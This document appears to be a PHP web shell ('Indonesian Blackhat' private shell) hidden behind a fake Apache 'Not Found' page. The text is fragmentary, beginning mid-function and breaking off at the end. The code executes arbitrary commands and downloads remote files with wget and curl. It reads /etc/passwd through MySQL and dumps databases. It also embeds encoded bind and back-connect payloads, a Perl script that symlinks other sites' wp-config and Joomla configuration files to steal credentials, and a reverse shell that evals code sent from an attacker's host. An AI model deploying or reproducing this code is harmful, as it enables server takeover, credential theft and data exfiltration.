Not Found

The requested URL was not found on this server.

Apache Server at Port 80

ON";}else {return "OFF";}} function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}} function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}} function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}} function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}} // check os if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; // change directory if(isset($_GET['y'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } } //hdd function convertByte($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } //server owner if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } // username, id, shell prompt and working directory if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $prompt = $user." >"; $pwd = realpath(".")."\\"; // find drive letters $v = explode("\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\"); if ($bool) { $letters .= "[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "".$letter."";} $letters .= " ] "; } } } function testoracle() { if (function_exists('ocilogon')) { return showstat("on"); } else { return showstat("off"); } } function testmssql() { if (function_exists('mssql_connect')) { return showstat("on"); } else { return showstat("off"); } } function showdisablefunctions() { if ($disablefunc=@ini_get("disable_functions")){ return "".$disablefunc.""; } else { return "NONE"; } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; // server ip $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); // your ip ;-) $my_ip = $_SERVER['REMOTE_ADDR']; $admin_id=$_SERVER['SERVER_ADMIN']; $bindport = "13123"; $bindport_pass = "inori"; // separate the working direcotory $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "".$pwds[$i]." ".DIRECTORY_SEPARATOR." "; } // rename file or folder if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } if(isset($_POST['chmod'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value;} @chmod($pwd.$name,octdec($value)); $file = $pwd.$name;} if(isset($_POST['chmod_folder'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value;} @chmod($pwd.$name,octdec($value)); $file = $pwd.$name;} // print useful info $buff = "Software : ".$software."
"; $buff .= "Uname : ".$system."
"; if($id != "") $buff .= "ID : uid=$uid ($user) gid=$gid ($group)
"; $buff .= "PHP : ".phpversion()." on ".php_sapi_name()."
"; $buff .= "Server ip : ".$server_ip." | Your ip : ".$my_ip." | Admin : ".$admin_id."
"; $buff .= "Free Disk: "."".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."
"; if($safemode) $buff .= "Safemode: ON
"; else $buff .= "Safemode: OFF
"; $buff .= "Disabled Functions: ".showdisablefunctions()."
"; $buff .= "MySQL: ".testmysql()." | MSSQL: ".testmssql()." | Oracle: ".testoracle()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."
"; $buff .= "".$letters." > ".$pwdurl.""; function rapih($text){ return trim(str_replace("
","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = @scandir($pwd)){ foreach($dh as $file){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } } else{ if($dh = @opendir($pwd)){ while($file = @readdir($dh)){ if(@is_dir($file)){ $dname[] = $file; } elseif(@is_file($file)){ $fname[] = $file; } } @closedir($dh); } } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = "

$prompt
view file/folder

"; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name']; } else { $owner = $user; } $buff .= " "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name']; } else { $owner = $user; } $buff .= ""; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name']; } else { $owner = $user; } $buff .= ""; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name']; } else { $owner = $user; } $buff .= ""; } $buff .= "

name	size	owner:group	perms	modified	actions
$folder	LINK	".$owner."	".get_perms($pwd)."	".date("d-M-Y H:i",@filemtime($pwd))."	newfile \| newfolder
$folder	LINK	".$owner."	".get_perms($parent)."	".date("d-M-Y H:i",@filemtime($parent))."	newfile \| newfolder
[ $folder ]	DIR	".$owner."	".get_perms($pwd.$folder)."	".date("d-M-Y H:i",@filemtime($folder))."	rename \| delete
$file	".ukuran($full)."	".$owner."	".get_perms($full)."	".date("d-M-Y H:i",@filemtime($full))."	edit \| rename \| delete \| download (gzip)

"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } // net tools $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; //confshell $configshell = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjx0aXRsZT4gTmdpbngxMzM3IENvbmZpZyBGdWNrZXIgPC90aXRsZT4NCjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iIyIvPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHkgew0KCWJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7DQoJYmFja2dyb3VuZC1pbWFnZTogdXJsKCMpOw0KfQ0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICM1OUU4MTc7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdmIudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictaW5jbHVkZXMtdmIudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRrb2xhLicyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nMy50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYWRtaW4vY29uZi5waHAnLCRrb2xhLic1LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nNC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDIzLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ibG9nL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3BibG9nLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC93cC1jb25maWcucGhwJywka29sYS4nLXdwZGlyLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25mX2dsb2JhbC5waHAnLCRrb2xhLic2LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJzcudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Nvbm5lY3QucGhwJywka29sYS4nOC50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWtfY29uZi5waHAnLCRrb2xhLic5LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tLnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2NvbmZpZy5waHAnLCRrb2xhLicxMi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobTE1LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobWMxNi50eHQnKTsNCiBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1zdXBwb3J0LnR4dCcpOw0KIHN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmMvY29uZmlnLnBocCcsJGtvbGEuJ215YmIudHh0Jyk7DQogc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luYy9jb25maWcucGhwJywka29sYS4nbXliYjIudHh0Jyk7DQoNCg0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQo8cD5MdWx6Ly4uLy4uLy4uLzwvcD4NCjxwPjxmb250IGNvbG9yPSIjQzBDMEMwIj5bPC9mb250PnJlY29kZWQgYnk8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+IG5naW54MTMzNzwvZm9udD48Zm9udCBjb2xvcj0iI0MwQzBDMCI+XTwvZm9udD4NCjxmb3JtIG1ldGhvZD0icG9zdCI+DQo8dGV4dGFyZWEgbmFtZT0icGFzcyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICNGRjAwMDA7IHdpZHRoOiA1NDNweDsgaGVpZ2h0OiA0MjBweDsgYmFja2dyb3VuZC1jb2xvcjojMEMwQzBDOyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZTo4cHQ7IGNvbG9yOiNGRjAwMDAiICA+PC90ZXh0YXJlYT48L3A+DQo8cCBhbGlnbj0iY2VudGVyIj4NCjxpbnB1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjRkYwMDAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkYwMDAwOyAiICAvPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPg0KPGlucHV0IG5hbWU9IlN1Ym1pdDEiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkdFVCBDT05GSUcgISIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICNGRjAwMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6IzU5RTgxNzsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+JzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIjsNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+WW91IGdvdCBpdCEhPGJyPjxicj48YnI+PGZvbnQgY29sb3I9IiNDMEMwQzAiPls8L2ZvbnQ+UmVjb2RlZCBieSA8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+TmdpbngxMzM3PC9mb250Pjxmb250IGNvbG9yPSIjQzBDMEMwIj5dPC9mb250PjwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5IaXQgTWUgVG8gRG93bmxvYWQgVGFyIEZpbGU8L3NwYW4+PC9mb250PjwvYT48L3A+JzsNCn0NCn0NCiBwcmludCINCjwvYm9keT4NCjwvaHRtbD4iOw0K'; ?> Indonesian Blackhat

Shu1337

Privat SHell

"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $query = "DROP TABLE IF EXISTS elz_table;\nCREATE TABLE `elz_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE elz_table;SELECT * FROM elz_table;\nDROP TABLE IF EXISTS elz_table;"; $msg = "

"; // show available tables $tables = array(); $msg .= ""; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= ""; } $msg .= "

available tables on ".$db."
$table

"; } elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ // dump tables $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "

"; $columns = array(); $msg = ""; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= ""; $kolum = $column; } $msg .= ""; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= ""; foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= ""; } $msg .= ""; } $msg .= "

$column
$data

"; $head = "

"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "

"; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "

".$query."; [ ok ]

"; $msg .= ""; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= ""; $msg .= ""; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= ""; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= ""; } $msg .= ""; } $msg .= "

".htmlspecialchars(@mysql_field_name($hasil,$i))."
".$dataz."

"; } else $msg .= "

".$query."; [ error ]

"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "

"; // show available database $dbs = array(); $msg .= ""; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= ""; } $msg .= "

available databases
$db

"; } @mysql_close($con); } else $msg = "

cant connect to mysql server

Connect to mySQL server
Host
Username
Password
Port

"; echo $msg; } else{ ?>

'; echo '

Database Dump
Server
Username
Password
DataBase Name
DB Type

'; if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "Dump-$dbname-$date"; $method = $_POST['method']; if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } function write($data) { global $fp; if ($_POST['method']=='ssql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }} mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='ssql'){ fclose ($fp); }else{ gzclose($fp);} header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } } ////////////////////////////////////////////////////// elseif(isset($_GET['x']) && ($_GET['x'] == 'tool')) { ?>

Reverse shell ( php )

Your IP
Port

"; echo $s_result; if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}} if(isset($_REQUEST['sqlportb4'])) $rsportb4 = 